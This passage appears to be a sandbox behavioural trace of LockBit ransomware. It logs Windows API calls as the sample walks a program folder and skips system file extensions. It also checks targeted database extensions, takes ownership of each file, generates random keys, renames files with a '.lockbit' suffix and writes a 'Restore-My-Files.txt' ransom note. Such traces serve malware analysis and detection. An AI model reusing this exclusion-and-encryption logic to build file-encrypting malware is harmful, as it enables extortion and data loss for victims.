lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.269] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.269] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.269] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.269] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.269] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.269] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.270] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.270] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.270] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.270] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.270] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.270] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.270] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.270] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.270] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.270] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.270] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.270] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.270] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.270] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.270] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.270] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.270] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.270] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.270] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NextMenuButtonIcon.png") returned 1 [0088.270] lstrcmpiW (lpString1="ntldr", lpString2="NextMenuButtonIcon.png") returned 1 [0088.270] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NextMenuButtonIcon.png") returned 1 [0088.270] lstrcmpiW (lpString1="bootsect.bak", lpString2="NextMenuButtonIcon.png") returned -1 [0088.270] lstrcmpiW (lpString1="autorun.inf", lpString2="NextMenuButtonIcon.png") returned -1 [0088.270] lstrcmpiW (lpString1="thumbs.db", lpString2="NextMenuButtonIcon.png") returned 1 [0088.270] lstrcmpiW (lpString1="iconcache.db", lpString2="NextMenuButtonIcon.png") returned -1 [0088.270] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0088.271] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png") returned=".png" [0088.271] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.271] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.271] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.271] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.271] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.271] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.271] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.271] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.271] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.271] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.271] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.271] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.271] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.271] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.271] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.271] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.271] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.272] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.272] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.272] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.272] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.272] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.272] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.272] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.272] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.272] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.272] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.272] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.272] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png.lockbit") returned 82 [0088.272] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\nextmenubuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.272] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.273] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.273] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.273] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.273] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.273] RtlFreeAnsiString (AnsiString="\\") [0088.273] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c8) returned 0x0 [0088.273] malloc (_Size=0x200) returned 0x77d800 [0088.273] NtQueryInformationToken (in: TokenHandle=0x3c8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.273] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.273] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.273] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.274] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.274] CloseHandle (hObject=0x3c8) returned 1 [0088.274] free (_Block=0x77d800) [0088.274] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\nextmenubuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c8 [0088.274] CreateIoCompletionPort (FileHandle=0x3c8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.274] malloc (_Size=0x40068) returned 0x3db00b8 [0088.275] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=3808) returned 1 [0088.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.276] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0088.276] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.276] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0088.276] ReadFile (in: hFile=0x3c8, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0088.278] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.278] malloc (_Size=0xba) returned 0x77d800 [0088.278] NtSetInformationFile (FileHandle=0x3c8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xba, FileInformationClass=0xa) returned 0x0 [0088.279] free (_Block=0x77d800) [0088.279] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0088.279] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0088.279] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.280] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f1f78f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f1f78f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xee2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ParentMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0088.280] lstrcmpiW (lpString1=".", lpString2="ParentMenuButtonIcon.png") returned -1 [0088.280] lstrcmpiW (lpString1="..", lpString2="ParentMenuButtonIcon.png") returned -1 [0088.280] PathFindExtensionW (pszPath="ParentMenuButtonIcon.png") returned=".png" [0088.280] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.280] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.280] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.280] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.281] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.281] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.281] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.281] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.281] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.281] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.281] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.281] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.281] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.282] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.282] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.282] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ParentMenuButtonIcon.png") returned 1 [0088.282] lstrcmpiW (lpString1="ntldr", lpString2="ParentMenuButtonIcon.png") returned -1 [0088.282] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ParentMenuButtonIcon.png") returned -1 [0088.282] lstrcmpiW (lpString1="bootsect.bak", lpString2="ParentMenuButtonIcon.png") returned -1 [0088.282] lstrcmpiW (lpString1="autorun.inf", lpString2="ParentMenuButtonIcon.png") returned -1 [0088.282] lstrcmpiW (lpString1="thumbs.db", lpString2="ParentMenuButtonIcon.png") returned 1 [0088.282] lstrcmpiW (lpString1="iconcache.db", lpString2="ParentMenuButtonIcon.png") returned -1 [0088.282] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0088.282] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png") returned=".png" [0088.282] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.282] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.282] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.282] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.282] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.282] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.282] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.282] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.282] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.282] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.283] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.283] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.283] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.283] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.283] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.283] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.283] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.283] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.283] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.283] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.283] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.283] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.283] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.283] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.283] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.283] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.283] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.283] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.283] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png.lockbit") returned 84 [0088.283] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\parentmenubuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.290] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.290] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.290] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.290] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.291] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.291] RtlFreeAnsiString (AnsiString="\\") [0088.291] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0088.291] malloc (_Size=0x200) returned 0x77d800 [0088.291] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.291] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.291] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.291] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.292] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.292] CloseHandle (hObject=0x3c0) returned 1 [0088.292] free (_Block=0x77d800) [0088.292] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\parentmenubuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0088.292] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.292] malloc (_Size=0x40068) returned 0x3df0128 [0088.293] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3df0140 | out: lpFileSize=0x3df0140*=3810) returned 1 [0088.293] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.293] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3015c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3015c) returned 0x0 [0088.293] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.294] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.294] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3016c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3016c) returned 0x0 [0088.294] ReadFile (in: hFile=0x3c0, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 0x0 [0088.301] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.301] malloc (_Size=0xbe) returned 0x77d800 [0088.301] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0088.301] free (_Block=0x77d800) [0088.302] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0088.302] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0088.302] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.302] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f1f78f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f1f78f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xeeb, dwReserved0=0x0, dwReserved1=0x0, cFileName="PreviousMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0088.302] lstrcmpiW (lpString1=".", lpString2="PreviousMenuButtonIcon.png") returned -1 [0088.302] lstrcmpiW (lpString1="..", lpString2="PreviousMenuButtonIcon.png") returned -1 [0088.302] PathFindExtensionW (pszPath="PreviousMenuButtonIcon.png") returned=".png" [0088.302] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.302] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.302] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.302] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.302] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.302] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.302] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.302] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.302] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.302] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.302] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.302] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.302] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.303] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.303] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.303] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.303] lstrcmpiW (lpString1=".bat", 